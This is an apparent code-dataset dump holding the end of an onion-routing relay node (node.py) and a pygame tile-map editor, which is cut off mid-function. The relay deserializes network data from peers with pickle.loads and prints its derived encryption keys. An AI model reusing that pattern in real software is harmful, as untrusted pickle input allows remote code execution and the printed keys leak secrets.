format=serialization.PublicFormat.Raw\n)\n\nprint('Ready for Circuit...')\nextends = 0\nrs.listen(2)\n\nbackend = default_backend()\ncircuits = []\nstreams = []\n#Circuit Creation\n# ----------------------------------------------------------------\n\ndef threaded_client(back):\n \"\"\"\n threaded_client(argument1)\n \n Name: Threaded_Client\n\n Creates a Thread\n\n argmuent1(object): Contains Data of connected Client\n \"\"\"\n\n proceed = True\n while proceed:\n data = back.recv(2048) # We get data from predecesor\n cell = pickle.loads(data)\n\n proceed = process(cell)\n#Functions\n# ----------------------------------------------------------------\ndef calculate_keys(cell):\n \"\"\"\n calculate_keys(argument1)\n Name: Calculate_Keys\n\n Key derivation function. Takes object in argument1 and derives key.\n\n argument1(object): Takes object from circuit creation and uses the value in object.hdata for key derivation\n \"\"\"\n #Check keys\n #if cell.hlen == 32 :\n peer_public = x25519.X25519PublicKey.from_public_bytes(cell.hdata)\n shared_onion_key = private_onion_key.exchange(peer_public)\n global derived_key\n derived_key = HKDF(\n algorithm=hashes.SHA256(),\n length=32,\n salt=None,\n info=b'handshake data',\n backend=backend\n ).derive(shared_onion_key)\n print('Shared Key:')\n print(derived_key)\n\ndef process(cell):\n \n \"\"\"\n process(argument1)\n Name: Process\n\n Takes cells from communication and process them depending on the celltyp\n\n argument1(object): Cell object for processing\n\n \"\"\"\n\n proceed = True\n global extends\n print(cell)\n if cell.command == b'\\x00\\n': #CREATE2\n calculate_keys(cell)\n circuits.append(cell.circID)\n print(\"Circuit IDs: {}\".format(circuits))\n cell.to_created(public_bytes)\n respond(cell)\n elif cell.command == b'\\x00\\x0e': #EXTEND2 - 2 Scenarios\n extends += 1\n if extends == 1: #Needs to extend\n connect_front(cell.lspec)\n cell = CreateCell(cell.hdata)\n circuits.append(cell.circID)\n print(\"Circuit IDs: {}\".format(circuits))\n forward(cell)\n else: #Just forward extend\n forward(cell)\n cell = load_front()\n proceed = process(cell)\n elif cell.command == b'\\x00\\x0b': #CREATED2\n cell.to_extended()\n respond(cell)\n elif cell.command == b'\\x00\\x0f': #EXTENDED2\n respond(cell)\n elif cell.command == b'\\x00\\x03': #RELAY // Two options\n cell.decrypt(derived_key)\n streams.append(cell.streamID)\n print('Running Streams: {}'.format(streams))\n if extends == 0: #If its the Exit Node...\n print(cell.data)\n connect_front(cell.data)\n if cell.recognized == b'0' : #Check if Cell is still encrypted\n print(\"Forwarding to Destination Server\")\n forward(cell.payload)\n cell = operate_endnode()\n else: \n print(\"Cell not recognized\")\n print(cell.show_payload())\n else:\n print('forwarding relay')\n forward(cell)\n cell = operate_node()\n\n elif cell.command == b'\\x00\\x04': #DESTROY\n if extends != 0:\n cell.set_circuit_id(circuits[1])\n forward(cell)\n front.close()\n circuits.clear()\n streams.clear()\n print('Circuit IDs: {} & Stream IDs: {}'.format(circuits, streams))\n proceed = False\n back.close()\n print('Circuit Closed!')\n else:\n print(cell.command)\n print(\"Non Recognized - Dropping Cell.\")\n\n return proceed\n\n\ndef operate_endnode():\n \"\"\"\n operate_endnode()\n Name: Operate_Endnode\n\n Function contains actions for messages on the Endnode in the Circuit\n\n return: Relay Cell\n\n \"\"\"\n operate = True\n while operate:\n print(\"Waiting for Server\")\n response = front.recv(1024)\n print(\"Processing Response\")\n resp = pickle.loads(response)\n relay = RelayCell(0, resp)\n relay.encrypt(derived_key)\n #relay.update_stream(circuit[0])\n print(\"Sending Relay\")\n respond(relay)\n print('Waiting for Client')\n relay = load_back()\n if relay.command == b'\\x00\\x04': # if Destroy\n operate = False\n else:\n relay.update_stream(streams[0])\n relay.decrypt(derived_key)\n print(relay.recognized)\n if relay.is_recognized():\n print(relay)\n forward(relay.payload)\n else:\n print(\"Relay not recognized\")\n print(relay.show_payload())\n return relay\n\ndef operate_node():\n \"\"\"\n operate_node()\n Name: Operate_Node\n\n Function contains actions for messages on the nodes in the Circuit\n\n return: Relay Cell\n\n \"\"\"\n operate = True\n while operate:\n print(\"Waiting for Server\")\n relay = load_front()\n print(\"Processing Response\")\n relay.encrypt(derived_key)\n #relay.update_stream(stream[0])\n print(\"Sending Relay\")\n respond(relay)\n print(\"Waiting for Client\")\n relay = load_back()\n if relay.command == b'\\x00\\x04': #Destroy\n operate = False\n else:\n print(relay)\n print(\"Processing Response\")\n relay.update_stream(streams[0])\n relay.decrypt(derived_key)\n forward(relay)\n return relay\n\n\ndef connect_front(ip):\n \"\"\"\n connect_front(argument1)\n Name: Connect_Front\n\n Uses the IP-adreese from argument1 to connect to the next node\n\n argument1: IP-adresse of the next node or destination\n \"\"\"\n global front\n front = socket.socket() #Initialize Socket for next Node\n try:\n front.connect((ip, PORT)) #Connect with next Node\n except error as e:\n print(str(e))\n\ndef load_back():\n \"\"\"\n load_back()\n Name: Load_Back\n\n Takes Data and converts it with pickle.\n\n return: object variable\n \"\"\"\n data = back.recv(1024)\n cell = pickle.loads(data)\n return cell\n\ndef load_front():\n \"\"\"\n load_front()\n Name: Load_Front\n\n Takes Data and converts it with pickle.\n\n return: object variable\n \"\"\"\n data = front.recv(1024)\n cell = pickle.loads(data)\n print(data)\n return cell\n\ndef respond(cell):\n \"\"\"\n respond(argument1)\n Name: Respond\n\n Converts Object with pickle and sends it\n\n argument1(object): cell object to send\n \"\"\"\n pickled_cell = pickle.dumps(cell)\n back.send(pickled_cell)\n\ndef forward(cell):\n \"\"\"\n Forward(argument1)\n Name: Forward\n\n Converts Object with pickle and sends it\n\n argument1(object): cell object to send \n \"\"\"\n pickled_cell = pickle.dumps(cell)\n front.send(pickled_cell)\n#Run Node\n#-----------------------------------------------------------\nwhile True:\n back, address = rs.accept()\n print('Connected to: ' +address[0] + ':' + str(address[1]))\n start_new_thread(threaded_client,(back, ))\n\nrs.close()\n","repo_name":"JosTorre/SpicyOnions","sub_path":"src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17605241513","text":"'''\n1 -> select tileset\n2 -> set map dimension\n\nctrl + s -> save map\nctrl + o -> load map\n~ctrl + n -> new map\n\nf -> fill\n~g -> turn on/off gridlines\n~d -> demo mode\n~b -> fill borders\n\nleft/down -> down z level\nright/up -> up z level\n\nESC -> exit\n\n\n(on tileset)\nleft click -> select a tile (unblocked)\nright click -> select a tile (blocked)\n~left click and drag -> select multiple tiles where a left click on map places them all down from topleft\n\n(on map)\nleft click -> place a tile\nright click -> remove a tile\nleft click and drag -> place tiles\n~right click and drag -> delete tiles\n\n\n\nTHINGS TO ADD:\n\n) Undo moves (keep a log/stack of all the actions and then code how to undo actions)\n) make z levels below you slightly transparent\n) exiting should prompt to save more intelligently (asks if you scroll on map)\n) only save an image to z-img when switching from a z with something on it (just check pos_z_tile)\n) Add a demo mode where you choose where to start then you can walk around it.\n) Make a \"new map\" button, so you don't have to exit out of the program\n) be able to toggle grphics on and off\n) fill borders button\n\nKnown Bugs\n\n) makes a second entry for the same tileset if you save, exit, then load the map then open the same tileset and use it\n'''\n\nimport pygame as pg\nfrom pygame.locals import *\n\nimport tkinter as tk\nfrom tkinter import messagebox, filedialog\n\nimport os\n\n# the width.height of tiles in pixels\nTILE_RES = (32, 32)\n\n\ndef tile2rect(x_y):\n return pg.Rect((x_y[0] * TILE_RES[0], x_y[1] * TILE_RES[1]), TILE_RES)\n\n\ndef pix2tile(x_y):\n return int(x_y[0] / TILE_RES[0]), int(x_y[1] / TILE_RES[1])\n\n\ndef pix2tile2rect(x_y):\n return tile2rect(pix2tile(x_y))\n\n\n# some color constants\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nGRAY = (200, 200, 200)\n\n# some folder constants\nMAPART_DIR = \"../art/map/\"\nSAVE_DIR = \"../maps/\"\n\npg.init()\npg.display.init()\n\n\ndef runMaker():\n #############################\n #############################\n #############################\n WH = (2000, 1000)\n\n screen = pg.display.set_mode(WH)\n # pg.display.set_icon(pg.image.load('icon.png').convert())\n pg.display.set_caption('Shattered Map Maker (ShaMM)')\n\n screen.fill(GRAY)\n\n ts_rect = pg.Rect((1, 1), (WH[0] * .25, WH[1] - 2))\n mp_rect = pg.Rect((4 + ts_rect.width, 1), (WH[0] - 1 - 4 - ts_rect.width, WH[1] - 2))\n ts = TS(screen.subsurface(ts_rect))\n mp = MP(screen.subsurface(mp_rect))\n\n pg.draw.line(screen, BLACK, (0, 0), (WH[0], 0))\n pg.draw.line(screen, BLACK, (0, 0), (0, WH[1]))\n pg.draw.line(screen, BLACK, (WH[0] - 1, 0), (WH[0] - 1, WH[1] - 1))\n pg.draw.line(screen, BLACK, (0, WH[1] - 1), (WH[0] - 1, WH[1] - 1))\n\n pg.draw.line(screen, BLACK, (ts.get_box_width() + 1, 0), (ts.get_box_width() + 1, WH[1]))\n pg.draw.line(screen, WHITE, (ts.get_box_width() + 2, 0), (ts.get_box_width() + 2, WH[1]))\n pg.draw.line(screen, BLACK, (ts.get_box_width() + 3, 0), (ts.get_box_width() + 3, WH[1]))\n\n pg.display.flip()\n\n #############################\n #############################\n #############################\n def pos_rel_to_ts(pos):\n return (pos[0] - 1, pos[1] - 1)\n\n def pos_rel_to_mp(pos):\n return (pos[0] - ts.get_box_width() - 4, pos[1] - 1)\n\n #############################\n #############################\n #############################\n clock = pg.time.Clock()\n #############################\n #############################\n #############################\n b1_held = False\n b3_held = False\n\n ctrl_held = False\n\n saved = True\n #############################\n #############################\n #############################\n while True:\n #############################\n #############################\n #############################\n clock.tick(30)\n thingsChanged = False\n #############################\n #############################\n #############################\n for evt in pg.event.get():\n #############################\n #############################\n #############################\n if evt.type == QUIT:\n endMM(saved)\n #############################\n #############################\n #############################\n elif evt.type == KEYDOWN:\n key = evt.dict['key']\n\n if key == K_LCTRL or key == K_RCTRL:\n ctrl_held = True\n\n if key == K_1: # prompt the user for the tile file and open it up\n ts.setCurrent()\n thingsChanged = True\n\n elif key == K_2:\n mp.setSize()\n thingsChanged = True\n saved = False\n\n elif key == K_s and ctrl_held:\n saved = mp.saveMap()\n\n elif key == K_o and ctrl_held:\n mp.loadMap()\n thingsChanged = True\n\n elif key == K_f:\n mp.fillWith(ts.selectedTile())\n thingsChanged = True\n saved = False\n\n elif key == K_RIGHT or key == K_UP:\n mp.changeZLevel(1)\n thingsChanged = True\n\n elif key == K_LEFT or key == K_DOWN:\n mp.changeZLevel(-1)\n thingsChanged = True\n\n elif key == K_SPACE:\n pass\n # pos = pg.mouse.get_pos()\n\n # if mp_rect.collidepoint(pos):\n # \tmp.space_at(pos_rel_to_mp(pos))\n # \tthingsChanged = True\n\n elif key == pg.K_ESCAPE:\n endMM(saved)\n #############################\n #############################\n #############################\n elif evt.type == KEYUP:\n key = evt.dict['key']\n\n if key == K_LCTRL or key == K_RCTRL:\n ctrl_held = False\n #############################\n #############################\n #############################\n elif evt.type == MOUSEBUTTONDOWN:\n button = evt.dict['button']\n pos = evt.dict['pos']\n\n if button == 1:\n b1_held = True\n\n if ts_rect.collidepoint(pos):\n ts.left_click_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_click_at(pos_rel_to_mp(pos), ts.selectedTile())\n thingsChanged = True\n saved = False\n\n elif button == 3:\n b3_held = True\n\n if ts_rect.collidepoint(pos):\n ts.right_click_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.right_click_at(pos_rel_to_mp(pos))\n thingsChanged = True\n saved = False\n #############################\n #############################\n #############################\n elif evt.type == MOUSEBUTTONUP:\n button = evt.dict['button']\n pos = evt.dict['pos']\n\n if button == 1:\n b1_held = False\n\n if ts_rect.collidepoint(pos):\n ts.left_release_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_release_at(pos_rel_to_mp(pos))\n thingsChanged = True\n\n elif button == 3:\n b3_held = False\n #############################\n #############################\n #############################\n if b1_held:\n pos = pg.mouse.get_pos()\n\n if ts_rect.collidepoint(pos):\n ts.left_hold_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_hold_at(pos_rel_to_mp(pos), ts.selectedTile())\n thingsChanged = True\n saved = False\n #############################\n #############################\n #############################\n if b3_held:\n pass\n #############################\n #############################\n #############################\n if thingsChanged: pg.display.flip()\n #############################\n #############################\n #############################\n\n\ndef endMM(saved):\n if not saved:\n master = tk.Tk()\n master.withdraw()\n t0 = messagebox.askyesno(\"Exit\", \"Are you sure you want to exit without saving?\")\n master.destroy()\n\n if t0:\n quit()\n else:\n return\n else:\n quit()\n\n\nclass Box:\n def __init__(self, surf):\n # the width of the scroll bar in pixels\n self.SB_WIDTH = 17\n\n # the colors of the scroll bar\n self.SB_COLOR = (240, 240, 240)\n self.B_COLOR = (150, 150, 150)\n self.BR_COLOR = (180, 180, 180)\n\n # surface minus what belongs to SBs\n # relative to box\n self.surf_rect = pg.Rect((0, 0), (surf.get_width() - self.SB_WIDTH, surf.get_height() - self.SB_WIDTH))\n self.surf = surf.subsurface(self.surf_rect)\n\n # small bottom right corner for indicator\n self.indicator_rect = pg.Rect((self.get_width(), self.get_height()), (self.SB_WIDTH, self.SB_WIDTH))\n self.indicator_surf = surf.subsurface(self.indicator_rect)\n\n # hSB surfaces\n # relative to box\n self.hSB_rect = pg.Rect((0, self.get_height()), (self.get_width(), self.SB_WIDTH))\n self.hSB_surf = surf.subsurface(self.hSB_rect)\n # relative to vSB\n self.hB1_rect = pg.Rect((0, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.hB1_surf = self.hSB_surf.subsurface(self.hB1_rect)\n self.hB2_rect = pg.Rect((self.hSB_rect.width - self.SB_WIDTH, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.hB2_surf = self.hSB_surf.subsurface(self.hB2_rect)\n self.hBR_rect = None\n self.hBR_surf = None\n self.h_imgpx_per_barpx = None\n\n self.hSB_surf.fill(self.SB_COLOR)\n self.hB1_surf.fill(self.B_COLOR)\n self.hB2_surf.fill(self.B_COLOR)\n\n # vSB surfaces\n # relative to box\n self.vSB_rect = pg.Rect((self.get_width(), 0), (self.SB_WIDTH, self.get_height()))\n self.vSB_surf = surf.subsurface(self.vSB_rect)\n # relative to vSB\n self.vB1_rect = pg.Rect((0, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.vB1_surf = self.vSB_surf.subsurface(self.vB1_rect)\n self.vB2_rect = pg.Rect((0, self.vSB_rect.height - self.SB_WIDTH), (self.SB_WIDTH, self.SB_WIDTH))\n self.vB2_surf = self.vSB_surf.subsurface(self.vB2_rect)\n self.vBR_rect = None\n self.vBR_surf = None\n self.v_imgpx_per_barpx = None\n\n self.vSB_surf.fill(self.SB_COLOR)\n self.vB1_surf.fill(self.B_COLOR)\n self.vB2_surf.fill(self.B_COLOR)\n\n # self.vSB_surf.fill(RED)\n # self.hSB_surf.fill(GREEN)\n\n self.img = None\n self.img_rect = None\n\n self.holdingBar = None\n\n def get_width(self):\n return self.surf.get_width()\n\n def get_height(self):\n return self.surf.get_height()\n\n def blit(self, *args):\n self.surf.blit(*args)\n\n def fill(self, *args):\n self.surf.fill(*args)\n\n def get_box_width(self):\n return self.get_width() + self.SB_WIDTH\n\n def get_box_height(self):\n return self.get_height() + self.SB_WIDTH\n\n def setImg(self, img):\n self.img = img\n\n w = img.get_width()\n if img.get_width() > self.surf_rect.width:\n w = self.surf_rect.width\n h = img.get_height()\n if img.get_height() > self.surf_rect.height:\n h = self.surf_rect.height\n\n self.img_rect = pg.Rect((0, 0), (w, h))\n\n self.blit(self.img.subsurface(self.img_rect), (0, 0))\n\n h_fraction = float(self.get_width()) / img.get_width()\n if h_fraction < 1:\n if h_fraction < 0.05:\n h_fraction = 0.05\n\n h_maxbarsize = (self.hSB_rect.width - self.hB1_rect.width - self.hB2_rect.width)\n h_barsize = int(h_maxbarsize * h_fraction)\n\n self.hBR_rect = pg.Rect((self.SB_WIDTH, 0), (h_barsize, self.SB_WIDTH))\n self.hBR_surf = self.hSB_surf.subsurface(self.hBR_rect)\n\n self.hBR_surf.fill(self.BR_COLOR)\n\n self.h_imgpx_per_barpx = (img.get_width() - self.get_width()) / float(h_maxbarsize - h_barsize)\n\n v_fraction = float(self.get_height()) / img.get_height()\n if v_fraction < 1:\n if v_fraction < 0.05:\n v_fraction = 0.05\n v_maxbarsize = (self.vSB_rect.height - self.vB1_rect.height - self.vB2_rect.height)\n v_barsize = int(v_maxbarsize * v_fraction)\n\n self.vBR_rect = pg.Rect((0, self.SB_WIDTH), (self.SB_WIDTH, v_barsize))\n self.vBR_surf = self.vSB_surf.subsurface(self.vBR_rect)\n\n self.vBR_surf.fill(self.BR_COLOR)\n\n self.v_imgpx_per_barpx = (img.get_height() - self.get_height()) / float(v_maxbarsize - v_barsize)\n\n def rel2abs_pos(self, pos): # relative to where it's scrolled to\n return (pos[0] + self.img_rect.left, pos[1] + self.img_rect.top)\n\n def abs2rel_pos(self, pos):\n return (pos[0] - self.img_rect.left, pos[1] - self.img_rect.top)\n\n def refreshRelImg(self):\n self.fill(GRAY)\n self.blit(self.img.subsurface(self.img_rect), (0, 0))\n\n def left_click_at(self, pos):\n if self.hSB_rect:\n if self.hSB_rect.collidepoint(pos):\n self.holdingBar = (\"h\", pos[0])\n return\n if self.vSB_rect:\n if self.vSB_rect.collidepoint(pos):\n self.holdingBar = (\"v\", pos[1])\n return\n\n def left_hold_at(self, pos):\n if not self.holdingBar:\n return\n\n elif self.holdingBar[0] == \"h\":\n pixChange = pos[0] - self.holdingBar[1]\n\n if not (self.hBR_rect.left + pixChange > self.hB1_rect.width):\n pixChange = self.hB1_rect.width - self.hBR_rect.left\n elif not (self.hBR_rect.right + pixChange <= self.hSB_rect.width - self.hB2_rect.width):\n pixChange = (self.hSB_rect.width - self.hB2_rect.width) - self.hBR_rect.right\n\n self.hBR_rect = pg.Rect((self.hBR_rect.left + pixChange, self.hBR_rect.top), self.hBR_rect.size)\n self.hBR_surf = self.hSB_surf.subsurface(self.hBR_rect)\n\n self.hSB_surf.fill(self.SB_COLOR)\n self.hB1_surf.fill(self.B_COLOR)\n self.hB2_surf.fill(self.B_COLOR)\n self.hBR_surf.fill(self.BR_COLOR)\n\n self.holdingBar = (self.holdingBar[0], pos[0])\n\n barOver_px = self.hBR_rect.left - self.hB1_rect.width\n imgShift = int(barOver_px * self.h_imgpx_per_barpx)\n self.img_rect = pg.Rect((imgShift, self.img_rect.top), self.img_rect.size)\n self.refreshRelImg()\n\n elif self.holdingBar[0] == \"v\":\n pixChange = pos[1] - self.holdingBar[1]\n\n if not (self.vBR_rect.top + pixChange > self.vB1_rect.height):\n pixChange = self.vB1_rect.height - self.vBR_rect.top\n elif not (self.vBR_rect.bottom + pixChange <= self.vSB_rect.height - self.vB2_rect.height):\n pixChange = (self.vSB_rect.height - self.vB2_rect.height) - self.vBR_rect.bottom\n\n self.vBR_rect = pg.Rect((self.vBR_rect.left, self.vBR_rect.top + pixChange), self.vBR_rect.size)\n self.vBR_surf = self.vSB_surf.subsurface(self.vBR_rect)\n\n self.vSB_surf.fill(self.SB_COLOR)\n self.vB1_surf.fill(self.B_COLOR)\n self.vB2_surf.fill(self.B_COLOR)\n self.vBR_surf.fill(self.BR_COLOR)\n\n self.holdingBar = (self.holdingBar[0], pos[1])\n\n barOver_px = self.vBR_rect.top - self.vB1_rect.height\n imgShift = int(barOver_px * self.v_imgpx_per_barpx)\n self.img_rect = pg.Rect((self.img_rect.left, imgShift), self.img_rect.size)\n self.refreshRelImg()\n\n def left_release_at(self, pos):\n self.holdingBar = None\n\n\nclass TS(Box):\n def __init__(self, surf):\n Box.__init__(self, surf)\n\n self.ts_selected = False\n self.ts_file = None\n\n self.selected_tile = None\n\n def tsSelected(self):\n return self.ts_selected\n\n def selectedTile(self):\n return self.selected_tile\n\n def setCurrent(self):\n master = tk.Tk()\n master.withdraw()\n t0 = filedialog.askopenfilename(initialdir=MAPART_DIR)\n master.destroy()\n\n # leave if they choose cancel\n if not t0:\n return\n\n t0 = os.path.relpath(t0)\n\n # leave if it isn't a supported file type\n try:\n t1 = pg.image.load(t0).convert()\n except:\n return\n\n self.ts_file = t0\n self.setImg(t1)\n self.ts_selected = True\n\n self.selected_tile = None\n\n self.fill(GRAY)\n self.blit(self.img, (0, 0))\n\n def left_click_at(self, pos, highlight=GREEN):\n if not self.ts_selected:\n return\n\n if not self.surf_rect.collidepoint(pos):\n Box.left_click_at(self, pos)\n return\n elif not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n\n pos = self.rel2abs_pos(pos)\n pos = pix2tile(pos)\n\n # reset the old selected tile (if it's not the first time)\n if self.selected_tile:\n # #if it's the same tile do nothing\n # if self.selected_tile.xy == pos:\n # \treturn\n\n # not anymore because you can right click to make it blocked\n\n rect = tile2rect(self.selected_tile.xy)\n self.img.subsurface(rect).fill(GRAY)\n self.img.blit(self.selected_tile.img, rect.topleft)\n\n # set the new tile\n rect = tile2rect(pos)\n self.selected_tile = Tile(self.ts_file, pos, self.img.subsurface(rect).copy())\n\n if highlight is GREEN:\n self.selected_tile.setBlocked(False)\n elif highlight is RED:\n self.selected_tile.setBlocked(True)\n else:\n print(\"invalid color choice for highlight/block\")\n\n # highlight the new tile\n surf = pg.Surface(TILE_RES)\n surf.fill(highlight)\n surf.set_alpha(75)\n self.img.blit(surf, rect.topleft)\n\n self.refreshRelImg()\n\n def right_click_at(self, pos):\n self.left_click_at(pos, highlight=RED)\n\n# def left_hold_at(self, pos):\n# \tif self.surf_rect.collidepoint(pos):\n# \t\tpass\n# \telse:\n# \t\tBox.left_hold_at(pos)\n# \t\treturn\n\n\nclass MP(Box):\n def __init__(self, surf):\n Box.__init__(self, surf)\n\n self.tileSize_selected = False\n self.tileSize = None\n\n self.currentZ = 0\n self.currentZ_img = None\n self.z_img = {}\n\n self.gridlines = None\n\n self.pos_z_tile = {}\n\n self.leftClickOnMap = False\n\n def setSize(self, automated=False):\n def submit():\n if not automated:\n failed = False\n\n try:\n x = int(x_entry.get())\n y = int(y_entry.get())\n\n if x < 1 or y < 1:\n failed = True\n except:\n failed = True\n\n if failed:\n messagebox.showerror(\"X/Y Error\", \"X and Y must be positive integers.\")\n return\n\n master.destroy()\n else:\n x = automated[0]\n y = automated[1]\n\n self.tileSize = (x, y)\n self.tileSize_selected = True\n\n self.setImg(pg.Surface((TILE_RES[0] * x + 1, TILE_RES[1] * y + 1))) # +1 for the last gridline\n self.img.fill(GRAY)\n\n self.currentZ_img = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n\n self.gridlines = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n for i in range(x + 1):\n pg.draw.line(self.gridlines, BLACK, (i * TILE_RES[0], 0), (i * TILE_RES[0], self.img.get_height() - 1))\n for i in range(y + 1):\n pg.draw.line(self.gridlines, BLACK, (0, i * TILE_RES[1]), (self.img.get_width() - 1, i * TILE_RES[1]))\n\n self.img.blit(self.gridlines, (0, 0))\n self.blit(self.img, (0, 0))\n\n # fill up the tile dict\n for i in range(x):\n for j in range(y):\n self.pos_z_tile[(i, j)] = {}\n\n if not automated:\n if self.tileSize_selected:\n master = tk.Tk()\n master.withdraw()\n messagebox.showwarning(\"Map Size\",\n \"You can't change the size once you've begun. Try saving (ctrl+S) and creating a new file (ctrl+N).\")\n return\n\n master = tk.Tk()\n master.title(\"Map Size\")\n frame = tk.Frame(master)\n frame.pack()\n\n r = 0\n tk.Label(frame, text=\"Choose an x & y:\").grid(row=r, column=0, columnspan=2, sticky=tk.W + tk.E)\n\n r += 1\n tk.Label(frame, text=\"X (in tiles):\").grid(row=r, column=0, columnspan=1, sticky=tk.W + tk.E)\n x_entry = tk.Entry(frame)\n x_entry.grid(row=r, column=1, columnspan=1, stick=tk.W + tk.E)\n\n r += 1\n tk.Label(frame, text=\"Y (in tiles):\").grid(row=r, column=0, columnspan=1, sticky=tk.W + tk.E)\n y_entry = tk.Entry(frame)\n y_entry.grid(row=r, column=1, columnspan=1, stick=tk.W + tk.E)\n\n r += 1\n submit_button = tk.Button(frame, text='Submit', fg='black', command=submit)\n submit_button.grid(row=r, column=0, columnspan=2, sticky=tk.W + tk.E)\n\n master.mainloop()\n\n else:\n submit()\n\n self.updateZIndicator(self.currentZ)\n\n def updateZIndicator(self, z):\n w = self.indicator_rect.width - 2\n h = self.indicator_rect.height - 2\n\n # first a gray box to mask old number\n surf = pg.Surface((w, h))\n surf.fill(GRAY)\n\n # then make the new number and put it on surf\n num = pg.font.Font(None, h)\n num = num.render(str(z), True, BLACK)\n surf.blit(num, (0, 0))\n\n # then put surf on the image\n self.indicator_surf.blit(surf, (1, 1))\n\n def left_click_at(self, pos, tile, automated_clicking=False):\n # the x/y has not been set\n if not self.tileSize_selected:\n return\n # the click was on the scroll bars BUT automated_clicking bypasses boundaries (for function fillWith)\n elif (not self.surf_rect.collidepoint(pos)) and (not automated_clicking):\n Box.left_click_at(self, pos)\n return\n # turn click on\n else:\n self.leftClickOnMap = True\n\n # click is outside of map but not on scroll bars (small map)\n if not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n # clcik is right on the border (the right and bottom gridlines)\n elif (self.rel2abs_pos(pos)[0] >= self.img.get_width() - 1) or (\n self.rel2abs_pos(pos)[1] >= self.img.get_height() - 1):\n return\n # no tile has been selected yet\n elif tile is None:\n return\n\n tile_img = tile.img.copy()\n if tile.blocked:\n # make red square\n surf = pg.Surface(TILE_RES)\n surf.fill(RED)\n surf.set_alpha(50)\n # put it on the tile img\n tile_img.blit(surf, (0, 0))\n\n # # prepare the image by drawing the graph lines\n # pg.draw.line(tile_img, BLACK, (0, 0), (TILE_RES[0]-1, 0))\n # pg.draw.line(tile_img, BLACK, (0, 0), (0, TILE_RES[1]-1))\n\n # blit the tile to the currentZ_img\n pos = self.rel2abs_pos(pos)\n rect = pix2tile2rect(pos)\n self.currentZ_img.blit(tile_img, rect)\n\n # place on main img: /gray, transparent z's below,/ itself, transparent zs above, gridline\n\n # for z in self.z_img:\n # \tif z > self.currentZ:\n # \t\ttemp = self.z_img[z].subsurface(rect).convert()\n # \t\ttemp.set_alpha(100)\n # \t\ttile_img.blit(temp, (0,0))\n tile_img.blit(self.gridlines.subsurface(rect), (0, 0))\n self.img.blit(tile_img, rect)\n\n self.refreshRelImg()\n\n # put it in the tile dict\n tile.setCoords(pix2tile(pos), self.currentZ)\n self.pos_z_tile[pix2tile(pos)][self.currentZ] = tile\n\n def left_hold_at(self, pos, tile):\n if not self.leftClickOnMap:\n Box.left_hold_at(self, pos)\n return\n\n self.left_click_at(pos, tile)\n\n def left_release_at(self, pos):\n if not self.leftClickOnMap:\n Box.left_hold_at(self, pos)\n return\n\n self.leftClickOnMap = False\n\n def right_click_at(self, pos):\n if not self.tileSize_selected:\n return\n\n if not self.surf_rect.collidepoint(pos):\n return\n elif not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n\n pos = self.rel2abs_pos(pos)\n\n try:\n del (self.pos_z_tile[pix2tile(pos)][self.currentZ])\n except:\n return\n\n rect = pix2tile2rect(pos)\n\n # make a gray tile with graph lines\n tile_img = pg.Surface(TILE_RES)\n tile_img.fill(GRAY)\n # put on the zs below images\n for z in self.z_img:\n if z < self.currentZ:\n temp = self.z_img[z].subsurface(rect)\n tile_img.blit(temp, (0, 0))\n # put the graph lines on\n tile_img.blit(self.gridlines.subsurface(rect), (0, 0))\n self.img.blit(tile_img, rect)\n\n # clear the z_img\n temp = self.currentZ_img.subsurface(rect)\n temp.fill((0, 0, 0, 0))\n\n # pg.draw.line(blank, BLACK, (0, 0), (TILE_RES[0]-1, 0))\n # pg.draw.line(blank, BLACK, (0, 0), (0, TILE_RES[1]-1))\n\n # blit the tile to the img\n # pos = self.rel2abs_pos(pos)\n self.img.blit(tile_img, rect)\n\n self.refreshRelImg()\n\n def fillWith(self, tile):\n if not tile:\n return\n elif not self.tileSize_selected:\n return\n\n master = tk.Tk()\n master.withdraw()\n t0 = messagebox.askyesno(\"Fill\",\n \"Are you sure you want to fill the entire map with this? It will overwrite all spots, not just empty ones.\")\n master.destroy()\n\n if t0:\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n self.left_click_at((i * TILE_RES[0], j * TILE_RES[1]), tile, automated_clicking=True)\n\n self.left_release_at((0, 0))\n\n def changeZLevel(self, ud):\n if not self.tileSize_selected:\n return\n\n if self.currentZ + ud < 0:\n return\n\n # save this z's image\n self.z_img[self.currentZ] = self.currentZ_img.copy()\n\n # go to new z and announce it\n self.currentZ += ud\n self.updateZIndicator(self.currentZ)\n\n try:\n # load the old z_img\n self.currentZ_img = self.z_img[self.currentZ]\n except:\n # make new currentZ_img\n self.currentZ_img = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n\n # main img: gray, transparent z's below, itself, transparent zs above, gridline\n self.img.fill(GRAY)\n # for z in self.z_img:\n # \ttemp = self.z_img[z]\n\n # \tif z != self.currentZ:\n # \t\ttemp = temp.copy()\n # \t\ttemp.set_alpha(50)\n\n # \tself.img.blit(temp, (0,0))\n\n for z in self.z_img:\n if z <= self.currentZ:\n temp = self.z_img[z]\n\n if z != self.currentZ:\n temp = temp.copy()\n temp.set_alpha(50)\n\n self.img.blit(temp, (0, 0))\n\n self.img.blit(self.gridlines, (0, 0))\n\n self.refreshRelImg()\n\n def saveMap(self):\n if not self.tileSize_selected:\n return True\n\n master = tk.Tk()\n master.withdraw()\n fileName = filedialog.asksaveasfilename(initialdir=SAVE_DIR)\n 